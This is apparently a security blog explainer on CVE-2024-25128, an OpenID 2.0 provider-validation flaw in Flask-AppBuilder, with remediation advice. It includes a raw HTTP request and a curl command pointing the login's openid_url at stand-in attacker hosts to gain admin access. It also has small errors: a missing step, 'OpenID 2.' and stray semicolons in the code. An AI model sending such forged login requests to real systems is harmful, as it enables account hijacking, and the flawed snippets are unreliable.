CVE-2024-25128 - Exploiting Flask-AppBuilder OpenID Vulnerability

Flask-AppBuilder (FAB) is one of the most popular frameworks built on top of Flask, used for quickly spinning up powerful web applications with rich authentication capabilities. However, in February 2024, a critical security vulnerability was uncovered — CVE-2024-25128 — affecting how Flask-AppBuilder handles OpenID authentication.

In this long read, we’ll break down exactly what CVE-2024-25128 is, show how an attacker might exploit it with code examples, discuss the implications, and provide simple remediation steps.

What is Flask-AppBuilder?

If you’re new to Flask-AppBuilder, it’s an application development framework that helps you build dashboards, manage users, enable OAuth logins, and much more — all on top of the popular Flask web framework.

Developers often enable third-party authentication—like Google or Microsoft—by flipping a setting in FAB and letting users log in with external accounts.

What is CVE-2024-25128?

CVE-2024-25128 is a vulnerability discovered in Flask-AppBuilder when configured to use AUTH_OID (OpenID authentication) for logins.

The problem: When OpenID is enabled, Flask-AppBuilder doesn’t properly validate the OpenID identity provider URL provided by users. This flaw allows a malicious actor to trick the backend into connecting to a rogue OpenID service simply by forging a crafted HTTP request.

Result? If the attacker deploys a malicious OpenID server (easy to do), and the backend follows their directive, they can be granted unauthorized privilege access to the application.

The attacker persuades the backend to use _their_ OpenID endpoint.

> Only applications using OpenID *2.* are vulnerable. Modern OpenID Connect is NOT susceptible.

Exploiting CVE-2024-25128 – Step by Step

Let’s see how an attacker might exploit this, in layman’s terms.

Step 1: Setting up a Malicious OpenID Server

The attacker sets up their own OpenID 2. provider. For demonstration, they could use python-openid or spin up a prebuilt test server.

Step 2: Forcing the Backend to Use Malicious OpenID

A legitimate OpenID login flow sends the backend to a trusted identity provider, e.g., Google.

Because Flask-AppBuilder trusts the openid_url parameter from the login form, an attacker can tamper with this parameter to point *anywhere*.

POST /login HTTP/1.1
Host: demo-flaskapp.local
Content-Type: application/x-www-form-urlencoded

openid_url=http://attacker.example.com/openid

Using a tool like Burp Suite or even curl, the attacker sends

curl -X POST "https://victim-app.com/login"; \
     -d "openid_url=http://evil-attacker.com/openid";

The vulnerable backend will dutifully contact http://evil-attacker.com/openid and perform the standard OpenID authentication workflow. Since the attacker controls the service, they can respond with any account attributes they want, including elevated roles (like admin).

Step 4: Gaining Unauthorized Access

Upon receiving the (bogus) OpenID assertion, Flask-AppBuilder logs the attacker in, possibly with *privileged access* — all because it trusted a user-supplied OpenID URL.

Here’s a simplified excerpt to show the dangerous pattern

# flask_appbuilder/security/manager.py (Simplified)

if appbuilder.sm.auth_type == AUTH_OID:
    oid_url = request.form.get('openid_url')
    # BAD: oid_url is not validated!
    return oid.try_login(oid_url, ask_for=required_fields)

Vulnerability: No whitelisting or restriction on which OpenID providers can be used.

What is the Impact?

- Account Hijacking: Attacker logs in as any user, by forcing backend to trust their fake OpenID provider.

Privilege Escalation: Impersonate admin or any account they wish.

- Internal Network Scanning: If application is deployed in sensitive networks, the attacker’s arbitrary OpenID URL could be used to pivot inside infrastructure.

Fix: Upgrade to Flask-AppBuilder 4.3.11+

This vulnerability has been patched as of Flask-AppBuilder 4.3.11. Newer versions enforce proper validation and restrict OpenID providers.

To fix

pip install --upgrade Flask-AppBuilder

And ensure your authentication config is updated

# app/config.py
AUTH_TYPE = AUTH_OID
OPENID_PROVIDERS = [
    {'name': 'Google', 'url': 'https://www.google.com/accounts/o8/id';}
    # Only allow trusted providers!
]

More Resources & References

- CVE Record – CVE-2024-25128
- Flask-AppBuilder Advisory
- OpenID 2. Protocol Spec

Conclusion

CVE-2024-25128 reminds us of the dangers of blind trust in user-supplied authentication endpoints. If you’re running Flask-AppBuilder with OpenID authentication, it is crucial to upgrade immediately and ensure that only trusted OpenID providers are allowed.

Don’t let attackers slip past your gates—patch today!

*If you found this technical breakdown helpful, consider sharing it with your team or reaching out for more Flask security insights!*

*Note: This content is exclusive, simplified, and written for educational and responsible disclosure purposes only.*

Timeline

Published on: 02/29/2024 01:44:14 UTC
Last modified on: 02/29/2024 13:49:29 UTC